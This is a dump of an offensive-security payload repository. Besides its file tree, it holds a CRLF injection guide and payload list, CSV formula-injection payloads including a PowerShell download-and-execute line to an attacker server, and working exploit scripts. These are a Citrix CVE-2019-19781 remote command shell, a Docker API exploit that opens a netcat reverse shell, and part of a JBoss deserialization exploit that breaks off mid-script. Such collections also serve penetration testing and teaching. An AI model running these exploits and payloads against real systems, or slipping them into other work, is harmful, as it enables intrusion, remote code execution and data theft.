├── .github
│   ├── FUNDING.yml
│   └── banner.png
├── .gitignore
├── API Key Leaks
│   └── README.md
├── AWS Amazon Bucket S3
│   └── README.md
├── Account Takeover
│   └── README.md
├── BOOKS.md
├── CONTRIBUTING.md
├── CORS Misconfiguration
│   └── README.md
├── CRLF Injection
│   ├── README.md
│   └── crlfinjection.txt
├── CSRF Injection
│   ├── Images
│   │   └── CSRF-CheatSheet.png
│   └── README.md
├── CSV Injection
│   └── README.md
├── CVE Exploits
│   ├── Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
│   ├── Apache Struts 2 CVE-2017-9805.py
│   ├── Apache Struts 2 CVE-2018-11776.py
│   ├── Citrix CVE-2019-19781.py
│   ├── Docker API RCE.py
│   ├── Drupalgeddon2 CVE-2018-7600.rb
│   ├── Heartbleed CVE-2014-0160.py
│   ├── JBoss CVE-2015-7501.py
│   ├── Jenkins CVE-2015-8103.py
│   ├── Jenkins CVE-2016-0792.py
│   ├── Jenkins Groovy Console.py
│   ├── README.md
│   ├── Rails CVE-2019-5420.rb
│   ├── Shellshock CVE-2014-6271.py
│   ├── Telerik CVE-2017-9248.py
│   ├── Telerik CVE-2019-18935.py
│   ├── Tomcat CVE-2017-12617.py
│   ├── WebLogic CVE-2016-3510.py
│   ├── WebLogic CVE-2017-10271.py
│   ├── WebLogic CVE-2018-2894.py
│   ├── WebSphere CVE-2015-7450.py
│   └── vBulletin RCE 5.0.0 - 5.5.4.sh
├── Command Injection
│   ├── Intruder
│   │   ├── command-execution-unix.txt
│   │   └── command_exec.txt
│   └── README.md
├── Directory Traversal
│   ├── Intruder
│   │   ├── deep_traversal.txt
│   │   ├── directory_traversal.txt
│   │   ├── dotdotpwn.txt
│   │   └── traversals-8-deep-exotic-encoding.txt
│   └── README.md
├── File Inclusion
│   ├── Intruders
│   │   ├── BSD-files.txt
│   │   ├── JHADDIX_LFI.txt
│   │   ├── LFI-FD-check.txt
│   │   ├── LFI-WindowsFileCheck.txt
│   │   ├── Linux-files.txt
│   │   ├── List_Of_File_To_Include.txt
│   │   ├── List_Of_File_To_Include_NullByteAdded.txt
│   │   ├── Mac-files.txt
│   │   ├── Traversal.txt
│   │   ├── Web-files.txt
│   │   ├── Windows-files.txt
│   │   ├── dot-slash-PathTraversal_and_LFI_pairing.txt
│   │   └── simple-check.txt
│   ├── README.md
│   ├── phpinfolfi.py
│   └── uploadlfi.py
├── GraphQL Injection
│   ├── Images
│   │   └── htb-help.png
│   └── README.md
├── HTTP Parameter Pollution
│   └── README.md
├── Insecure Deserialization
│   ├── Files
│   │   ├── PHP-Serialization-RCE-Exploit.php
│   │   └── Ruby_universal_gadget_generate_verify.rb
│   ├── Java.md
│   ├── PHP.md
│   ├── Python.md
│   ├── README.md
│   └── Ruby.md
├── Insecure Direct Object References
│   ├── Images
│   │   └── idor.png
│   └── README.md
├── Insecure Management Interface
│   ├── Intruder
│   │   └── springboot_actuator.txt
│   └── README.md
├── Insecure Source Code Management
│   └── README.md
├── JSON Web Token
│   └── README.md
├── Kubernetes
│   └── readme.md
├── LDAP Injection
│   ├── Intruder
│   │   ├── LDAP_FUZZ.txt
│   │   └── LDAP_attributes.txt
│   └── README.md
├── LICENSE
├── LaTeX Injection
│   └── README.md
├── Methodology and Resources
│   ├── Active Directory Attack.md
│   ├── Bind Shell Cheatsheet.md
│   ├── Cloud - AWS Pentest.md
│   ├── Cloud - Azure Pentest.md
│   ├── Cobalt Strike - Cheatsheet.md
│   ├── Container - Docker Pentest.md
│   ├── Escape Breakout.md
│   ├── Linux - Persistence.md
│   ├── Linux - Privilege Escalation.md
│   ├── MSSQL Server - Cheatsheet.md
│   ├── Metasploit - Cheatsheet.md
│   ├── Methodology and enumeration.md
│   ├── Miscellaneous - Tricks.md
│   ├── Network Discovery.md
│   ├── Network Pivoting Techniques.md
│   ├── Office - Attacks.md
│   ├── Reverse Shell Cheatsheet.md
│   ├── Subdomains Enumeration.md
│   ├── Windows - AMSI Bypass.md
│   ├── Windows - Download and Execute.md
│   ├── Windows - Mimikatz.md
│   ├── Windows - Persistence.md
│   ├── Windows - Post Exploitation Koadic.md
│   ├── Windows - Privilege Escalation.md
│   └── Windows - Using credentials.md
├── NoSQL Injection
│   ├── Intruder
│   │   └── NoSQL.txt
│   └── README.md
├── OAuth
│   └── README.md
├── Open Redirect
│   ├── Intruder
│   │   ├── Open-Redirect-payloads.txt
│   │   ├── open_redirect_wordlist.txt
│   │   └── openredirects.txt
│   └── README.md
├── README.md
├── Race Condition
│   └── README.md
├── Request Smuggling
│   └── README.md
├── SAML Injection
│   ├── Images
│   │   ├── SAML-xml-flaw.png
│   │   └── XSLT1.jpg
│   └── README.md
├── SQL Injection
│   ├── Cassandra Injection.md
│   ├── HQL Injection.md
│   ├── Images
│   │   ├── PostgreSQL_cmd_exec.png
│   │   ├── Unicode_SQL_injection.png
│   │   └── wildcard_underscore.jpg
│   ├── Intruder
│   │   ├── Auth_Bypass.txt
│   │   ├── Auth_Bypass2.txt
│   │   ├── FUZZDB_MSSQL-WHERE_Time.txt
│   │   ├── FUZZDB_MSSQL.txt
│   │   ├── FUZZDB_MSSQL_Enumeration.txt
│   │   ├── FUZZDB_MYSQL.txt
│   │   ├── FUZZDB_MySQL-WHERE_Time.txt
│   │   ├── FUZZDB_MySQL_ReadLocalFiles.txt
│   │   ├── FUZZDB_Oracle.txt
│   │   ├── FUZZDB_Postgres_Enumeration.txt
│   │   ├── Generic_ErrorBased.txt
│   │   ├── Generic_Fuzz.txt
│   │   ├── Generic_TimeBased.txt
│   │   ├── Generic_UnionSelect.txt
│   │   ├── SQL-Injection
│   │   ├── SQLi_Polyglots.txt
│   │   ├── payloads-sql-blind-MSSQL-INSERT
│   │   ├── payloads-sql-blind-MSSQL-WHERE
│   │   ├── payloads-sql-blind-MySQL-INSERT
│   │   ├── payloads-sql-blind-MySQL-ORDER_BY
│   │   └── payloads-sql-blind-MySQL-WHERE
│   ├── MSSQL Injection.md
│   ├── MySQL Injection.md
│   ├── OracleSQL Injection.md
│   ├── PostgreSQL Injection.md
│   ├── README.md
│   └── SQLite Injection.md
├── Server Side Request Forgery
│   ├── Files
│   │   ├── SSRF_expect.svg
│   │   ├── SSRF_url.svg
│   │   ├── ip.py
│   │   ├── ssrf_ffmpeg.avi
│   │   ├── ssrf_iframe.svg
│   │   ├── ssrf_svg_css_import.svg
│   │   ├── ssrf_svg_css_link.svg
│   │   ├── ssrf_svg_css_xmlstylesheet.svg
│   │   ├── ssrf_svg_image.svg
│   │   └── ssrf_svg_use.svg
│   ├── Images
│   │   ├── Parser & Curl < 7.54.png
│   │   ├── SSRF_PDF.png
│   │   ├── SSRF_Parser.png
│   │   ├── SSRF_stream.png
│   │   ├── WeakParser.jpg
│   │   └── aws-cli.jpg
│   └── README.md
├── Server Side Template Injection
│   ├── Images
│   │   └── serverside.png
│   ├── Intruder
│   │   └── ssti.fuzz
│   └── README.md
├── TWITTER.md
├── Tabnabbing
│   └── README.md
├── Type Juggling
│   └── README.md
├── Upload Insecure Files
│   ├── CVE Ffmpeg HLS
│   │   ├── README.md
│   │   ├── gen_avi_bypass.py
│   │   ├── gen_xbin_avi.py
│   │   ├── read_passwd.avi
│   │   ├── read_passwd_bypass.mp4
│   │   ├── read_shadow.avi
│   │   └── read_shadow_bypass.mp4
│   ├── CVE ZIP Symbolic Link
│   │   ├── etc_passwd.zip
│   │   ├── generate.sh
│   │   └── passwd
│   ├── Configuration Apache .htaccess
│   │   ├── .htaccess
│   │   ├── .htaccess_phpinfo
│   │   ├── .htaccess_shell
│   │   └── README.md
│   ├── Configuration Busybox httpd.conf
│   │   ├── README.md
│   │   ├── httpd.conf
│   │   └── shellymcshellface.sh
│   ├── Configuration IIS web.config
│   │   ├── web.config
│   │   └── web.web.config
│   ├── Configuration Python __init__.py
│   │   ├── python-admin-__init__.py.zip
│   │   ├── python-conf-__init__.py.zip
│   │   ├── python-config-__init__.py.zip
│   │   ├── python-controllers-__init__.py.zip
│   │   ├── python-generate-init.py
│   │   ├── python-login-__init__.py.zip
│   │   ├── python-models-__init__.py.zip
│   │   ├── python-modules-__init__.py.zip
│   │   ├── python-scripts-__init__.py.zip
│   │   ├── python-settings-__init__.py.zip
│   │   ├── python-tests-__init__.py.zip
│   │   ├── python-urls-__init__.py.zip
│   │   ├── python-utils-__init__.py.zip
│   │   └── python-view-__init__.py.zip
│   ├── EICAR
│   │   └── eicar.txt
│   ├── Extension ASP
│   │   ├── shell.asa
│   │   ├── shell.ashx
│   │   ├── shell.asmx
│   │   ├── shell.asp
│   │   ├── shell.aspx
│   │   ├── shell.cer
│   │   └── shell.xamlx
│   ├── Extension Flash
│   │   ├── README.md
│   │   ├── xss.swf
│   │   └── xssproject.swf
│   ├── Extension HTML
│   │   └── xss.html
│   ├── Extension PDF JS
│   │   ├── poc.js
│   │   ├── poc.py
│   │   └── result.pdf
│   ├── Extension PHP
│   │   ├── extensions.lst
│   │   ├── phpinfo.jpg.php
│   │   ├── phpinfo.phar
│   │   ├── phpinfo.php
│   │   ├── phpinfo.php3
│   │   ├── phpinfo.php4
│   │   ├── phpinfo.php5
│   │   ├── phpinfo.php7
│   │   ├── phpinfo.phpt
│   │   ├── phpinfo.pht
│   │   ├── phpinfo.phtml
│   │   ├── shell.gif?shell.php
│   │   ├── shell.jpeg.php
│   │   ├── shell.jpg.php
│   │   ├── shell.jpg?shell.php
│   │   ├── shell.pgif
│   │   ├── shell.phar
│   │   ├── shell.php
│   │   ├── shell.php3
│   │   ├── shell.php4
│   │   ├── shell.php5
│   │   ├── shell.php7
│   │   ├── shell.phpt
│   │   ├── shell.pht
│   │   ├── shell.phtml
│   │   ├── shell.png.php
│   │   └── shell.png?shell.php
│   ├── Picture Image Magik
│   │   ├── README.md
│   │   ├── convert_local_etc_passwd.svg
│   │   ├── convert_local_etc_passwd_html.svg
│   │   ├── ghostscript_rce_curl.jpg
│   │   ├── imagemagik_ghostscript_cmd_exec.pdf
│   │   ├── imagemagik_ghostscript_reverse_shell.jpg
│   │   ├── imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
│   │   ├── imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
│   │   ├── imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
│   │   ├── imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
│   │   ├── imagetragik1_payload_imageover_wget.gif
│   │   ├── imagetragik1_payload_url_bind_shell_nc.mvg
│   │   ├── imagetragik1_payload_url_curl.png
│   │   ├── imagetragik1_payload_url_portscan.jpg
│   │   ├── imagetragik1_payload_url_remote_connection.mvg
│   │   ├── imagetragik1_payload_url_reverse_shell_bash.mvg
│   │   ├── imagetragik1_payload_url_touch.jpg
│   │   ├── imagetragik1_payload_xml_reverse_shell_nctraditional.xml
│   │   ├── imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
│   │   ├── imagetragik2_burpcollaborator_passwd.jpg
│   │   ├── imagetragik2_centos_id.jpg
│   │   ├── imagetragik2_ubuntu_id.jpg
│   │   ├── imagetragik2_ubuntu_shell.jpg
│   │   └── imagetragik2_ubuntu_shell2.jpg
│   ├── Picture Metadata
│   │   ├── Build_image_to_LFI.py
│   │   ├── PHP_exif_phpinfo.jpg
│   │   ├── PHP_exif_system.gif
│   │   ├── PHP_exif_system.jpg
│   │   └── PHP_exif_system.png
│   ├── Picture Resize
│   │   ├── GIF_exploit.gif
│   │   ├── JPG_exploit-55.jpg
│   │   ├── PNG_110x110_resize_bypass_use_LFI.png
│   │   ├── PNG_32x32_resize_bypass_use_LFI.png
│   │   ├── README.txt
│   │   ├── exploit_JPG.py
│   │   └── exploit_PNG_110x110.php
│   ├── README.md
│   ├── Server Side Include
│   │   ├── exec.shtml
│   │   ├── include.shtml
│   │   └── index.stm
│   └── Zip Slip
│       └── README.md
├── Web Cache Deception
│   ├── Intruders
│   │   └── param_miner_lowercase_headers.txt
│   └── README.md
├── Web Sockets
│   ├── Files
│   │   └── ws-harness.py
│   ├── Images
│   │   ├── WebsocketHarness.jpg
│   │   ├── sqlmap.png
│   │   └── websocket-harness-start.png
│   └── README.md
├── XPATH Injection
│   └── README.md
├── XSLT Injection
│   └── README.md
├── XSS Injection
│   ├── Files
│   │   ├── ">
│   │   ├── '>
│   │   ├── InsecureFlashFile.swf
│   │   ├── JupyterNotebookXSS.ipynb
│   │   ├── SVG_XSS.svg
│   │   ├── SVG_XSS1.svg
│   │   ├── SVG_XSS2.svg
│   │   ├── SVG_XSS3.svg
│   │   ├── SWF_XSS.swf
│   │   ├── mouseover-xss-ecs.jpeg
│   │   ├── onclick-xss-ecs.jpeg
│   │   ├── payload_in_all_known_exif_corrupted.jpg
│   │   ├── payload_in_all_known_exif_corrupted.png
│   │   ├── payload_in_all_known_metadata.jpg
│   │   ├── payload_in_all_known_metadata.png
│   │   ├── payload_text_xss.png
│   │   ├── xml.xsd
│   │   ├── xss.cer
│   │   ├── xss.dtd
│   │   ├── xss.htm
│   │   ├── xss.html.demo
│   │   ├── xss.hxt
│   │   ├── xss.mno
│   │   ├── xss.rdf
│   │   ├── xss.svgz
│   │   ├── xss.url.url
│   │   ├── xss.vml
│   │   ├── xss.wsdl
│   │   ├── xss.xht
│   │   ├── xss.xhtml
│   │   ├── xss.xml
│   │   ├── xss.xsd
│   │   ├── xss.xsf
│   │   ├── xss.xsl
│   │   ├── xss.xslt
│   │   ├── xss_comment_exif_metadata_double_quote.png
│   │   └── xss_comment_exif_metadata_single_quote.png
│   ├── Images
│   │   └── DwrkbH1VAAErOI2.jpg
│   ├── Intruders
│   │   ├── 0xcela_event_handlers.txt
│   │   ├── BRUTELOGIC-XSS-JS.txt
│   │   ├── BRUTELOGIC-XSS-STRINGS.txt
│   │   ├── IntrudersXSS.txt
│   │   ├── JHADDIX_XSS.txt
│   │   ├── MarioXSSVectors.txt
│   │   ├── RSNAKE_XSS.txt
│   │   ├── XSSDetection.txt
│   │   ├── XSS_Polyglots.txt
│   │   ├── jsonp_endpoint.txt
│   │   ├── xss_alert.txt
│   │   ├── xss_payloads_quick.txt
│   │   └── xss_swf_fuzz.txt
│   ├── README.md
│   ├── XSS in Angular.md
│   └── XSS with Relative Path Overwrite.md
├── XXE Injection
│   ├── Files
│   │   ├── Classic XXE - etc passwd.xml
│   │   ├── Classic XXE B64 Encoded.xml
│   │   ├── Classic XXE.xml
│   │   ├── Deny Of Service - Billion Laugh Attack
│   │   ├── XXE OOB Attack (Yunusov, 2013).xml
│   │   └── XXE PHP Wrapper.xml
│   ├── Intruders
│   │   ├── XXE_Fuzzing.txt
│   │   └── xml-attacks.txt
│   └── README.md
├── YOUTUBE.md
└── _template_vuln
    └── README.md

--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: swisskyrepo
ko_fi: swissky # Replace with a single Ko-fi username
custom: https://www.buymeacoffee.com/swissky

--------------------------------------------------------------------------------
/.github/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/.github/banner.png

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
BuildPDF/
.vscode
.todo
AWS Amazon Lambda/

--------------------------------------------------------------------------------
/BOOKS.md:
--------------------------------------------------------------------------------
# Books list

Grab a book and relax; these are the best security books (in my opinion).

- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)

--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
# CONTRIBUTING

PayloadsAllTheThings' Team :heart: pull requests :)
Feel free to improve with your payloads and techniques!

You can also contribute with a :beers: IRL, or using the sponsor button.

## Techniques Folder

Every section should contain the following files; you can use the `_template_vuln` folder to create a new technique folder:

- README.md - vulnerability description and how to exploit it, including several payloads, more below
- Intruder - a set of files to give to Burp Intruder
- Images - pictures for the README.md
- Files - some files referenced in the README.md

## README.md format

Use the following example to create a new technique `README.md` file.

```markdown
# Vulnerability Title

> Vulnerability description

## Summary

* [Tools](#tools)
* [Something](#something)
  * [Subentry 1](#sub1)
  * [Subentry 2](#sub2)
* [References](#references)

## Tools

- [Tool 1](https://example.com)
- [Tool 2](https://example.com)

## Something

Quick explanation

## References

- [Blog title - Author, Date](https://example.com)
```

--------------------------------------------------------------------------------
/CRLF Injection/README.md:
--------------------------------------------------------------------------------
# CRLF

> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line; however, they are dealt with differently in today's popular operating systems. For example, in Windows both a CR and an LF are required to note the end of a line, whereas in Linux/UNIX only an LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

## Summary

- [CRLF - Add a cookie](#crlf---add-a-cookie)
- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
- [CRLF - Write HTML](#crlf---write-html)
- [CRLF - Filter Bypass](#crlf---filter-bypass)
- [References](#references)

## CRLF - Add a cookie

Requested page

```http
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
```

HTTP Response

```http
Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
```

## CRLF - Add a cookie - XSS Bypass

Requested page

```http
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2f%2e%2e
```

HTTP Response

```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: 
0
```

## CRLF - Write HTML

Requested page

```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
```

HTTP response

```http
Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

You have been Phished
```

## CRLF - Filter Bypass

Using UTF-8 encoding

```http
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
```

Reminder:

* %E5%98%8A = %0A = \u560a
* %E5%98%8D = %0D = \u560d
* %E5%98%BE = %3E = \u563e (>)
* %E5%98%BC = %3C = \u563c (<)

## Exploitation Tricks

* Try to search for parameters that lead to redirects and fuzz them
* Also test the mobile version of the website; sometimes it is different or uses a different backend

## References

* https://www.owasp.org/index.php/CRLF_Injection
* https://vulners.com/hackerone/H1:192749

--------------------------------------------------------------------------------
/CRLF Injection/crlfinjection.txt:
--------------------------------------------------------------------------------
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

--------------------------------------------------------------------------------
/CSRF Injection/Images/CSRF-CheatSheet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/CSRF Injection/Images/CSRF-CheatSheet.png

--------------------------------------------------------------------------------
/CSV Injection/README.md:
--------------------------------------------------------------------------------
# CSV Injection (Formula Injection)

Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When the web application does not properly validate the contents written to the CSV file, the spreadsheet application may interpret the contents of a cell (or many cells) as a formula and execute it.

## Exploit

Basic exploit with Dynamic Data Exchange

```powershell
# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0

# pop a notepad
=cmd|' /C notepad'!'A1'

# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

# Prefix obfuscation and command chaining
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
= cmd|'/c calc.exe'!A

# Using rundll32 instead of cmd
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
= C m D | '/ c c al c . e x e ' ! A

```

Technical details of the above payloads:

- `cmd` is the DDE server (application) name that the client addresses when it tries to reach the server
- `/C calc` is the topic, here the file to run, i.e. calc (calc.exe)
- `!A0` is the item name; it specifies the unit of data the server responds with when the client requests the data

Any formula can be started with

```powershell
=
+
-
@
```

## References

* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)

--------------------------------------------------------------------------------
/CVE Exploits/Citrix CVE-2019-19781.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# https://github.com/mpgn/CVE-2019-19781
# # #

import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")

if len(sys.argv) < 2:
    print("[-] No URL provided")
    sys.exit(0)

while True:
    try:
        command = input("command > ")

        random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
        print("[+] Adding bookmark", random_xml + ".xml")

        burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
        burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                         random_xml, "NSC_NONCE": "c", "Connection": "close"}
        burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
        r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

        if r.status_code == 200:
            print("[+] Bookmark added")
        else:
            print("\n[-] Target not vulnerable or something went wrong")
            sys.exit(0)

        burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
        burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                         random_xml, "NSC_NONCE": "c", "Connection": "close"}
        r = requests.get(burp0_url, headers=burp0_headers, verify=False)

        replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE)
        print("[+] Result of the command: \n")
        print(replaced)

    except KeyboardInterrupt:
        print("Exiting...")
        break

--------------------------------------------------------------------------------
/CVE Exploits/Docker API RCE.py:
--------------------------------------------------------------------------------
from __future__ import print_function
import requests
import logging
import json
import urllib.parse

# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..

name = "docker"
description = "Docker RCE via Open Docker API on port 2375"
author = "Swissky"

# Step 1 - Extract id and name from each container
ip = "127.0.0.1"
port = "2375"
data = "containers/json"
url = "http://{}:{}/{}".format(ip, port, data)
r = requests.get(url)

# r.json is a method; it has to be called, otherwise the check is always true
if r.json():
    for container in r.json():
        container_id = container['Id']
        container_name = container['Names'][0].replace('/','')
        print((container_id, container_name))

# Step 2 - Prepare command
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
data = "containers/{}/exec".format(container_name)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
post_header = {
    "Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))


# Step 3 - Execute command
id_cmd = r.json()['Id']
data = "exec/{}/start".format(id_cmd)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "Detach":false,"Tty":false}'
post_header = {
    "Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))
print(r)

--------------------------------------------------------------------------------
/CVE Exploits/JBoss CVE-2015-7501.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python2

# Jboss Java Deserialization RCE (CVE-2015-7501)
# Made with <3 by @byt3bl33d3r

from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import argparse
import sys, os
#from binascii import hexlify, unhexlify
from subprocess import check_output

ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None

parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')

if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

if not args.ysoserial_path:
    for path in ysoserial_default_paths:
        if os.path.exists(path):
            ysoserial_path = path
else:
    if os.path.exists(args.ysoserial_path):
        ysoserial_path = args.ysoserial_path

if ysoserial_path is None:
    print('[-] Could not find ysoserial JAR file')
    sys.exit(1)

if len(args.target.split(":")) != 2:
    print('[-] Target must be in format IP:PORT')
    sys.exit(1)

if not args.command:
    print('[-] You must specify a command to run')
    sys.exit(1)

ip, port = args.target.split(':')

print('[*] Target IP: {}'.format(ip))
